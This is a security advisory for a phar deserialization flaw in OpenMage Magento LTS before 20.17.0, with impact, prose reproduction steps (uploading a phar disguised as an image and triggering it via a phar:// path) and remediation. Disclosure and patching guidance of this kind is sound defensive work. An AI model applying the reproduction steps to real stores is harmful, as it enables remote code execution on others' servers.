OpenMage Magento LTS Phar Deserialization Vulnerability Leading to Arbitrary Code Execution

A vulnerability in OpenMage Magento Long Term Support (LTS) versions prior to 20.17.0 allows for arbitrary code execution through phar deserialization. This issue arises during image validation and media handling, where PHP functions like 'getimagesize()', 'file_exists()', and 'is_readable()' can be manipulated to process 'phar://' stream wrapper paths. An attacker could upload a malicious phar file disguised as an image, triggering one of these functions and executing arbitrary code.

Impact

Exploitation of this vulnerability leads to arbitrary code execution on the server.

Reproduction

To reproduce this vulnerability, upload a phar file disguised as an image (such as a JPEG) using a vector that allows file uploads, like product images or CMS media. Once the file is uploaded, the vulnerability can be triggered by accessing the file with a 'phar://' path using a function that processes images, such as 'getimagesize()'. This will deserialize the phar metadata and execute the embedded payload.

Remediation

Users can upgrade to OpenMage Magento LTS version 20.17.0, which removes support for ICO files (a vector for this attack) and disables the 'phar://' stream wrapper. If an immediate upgrade is not possible, 'phar://' can be disabled in the php.ini file or through code, and additional upload validations can be implemented.